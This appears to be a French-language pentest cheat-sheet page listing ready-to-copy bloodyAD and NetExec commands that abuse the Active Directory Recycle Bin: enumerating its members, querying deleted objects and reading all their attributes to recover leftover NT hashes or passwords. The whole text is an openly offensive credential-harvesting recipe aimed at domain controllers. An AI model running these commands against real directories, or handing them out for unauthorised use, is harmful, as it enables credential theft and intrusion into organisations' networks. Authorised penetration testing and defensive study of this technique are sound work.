Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'AD Recycle Bin'Description: Lister les membres du groupe AD Recycle Bin : peuvent lire les objets supprimés.
Exploitation
AD Recycle Bin
Lire les objets supprimés de l'AD pour retrouver des credentials ou des hashes résiduels.
Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --filter '(isDeleted=TRUE)' --attr sAMAccountName,userPrincipalName --include-deletedDescription: Lister les objets supprimés de l'AD : peuvent contenir des comptes avec des hashes ou mots de passe.
Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object 'CN=$DELETED_USER\0ADEL:$GUID,CN=Deleted Objects,$BASEDN' --attr * --include-deletedDescription: Lire tous les attributs d'un objet supprimé : le hash NT peut encore être présent.
Copy command
nxc ldap $DC -u $USER -p $PASS --query '(isDeleted=TRUE)' 'sAMAccountName unicodePwd'Description: Alternative NXC pour requêter les objets supprimés avec leurs attributs de credential.